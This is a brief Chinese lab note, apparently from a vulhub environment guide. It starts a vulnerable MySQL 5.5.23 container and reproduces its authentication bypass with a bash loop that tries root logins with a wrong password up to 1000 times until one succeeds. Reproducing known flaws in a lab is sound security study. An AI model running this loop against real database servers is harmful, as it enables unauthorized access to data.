搭建 进入vulhub对应mysql漏洞环境,执行如下命令即可 docker-compose up -d 如上则启动成功 环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。 漏洞复现 在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录: for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done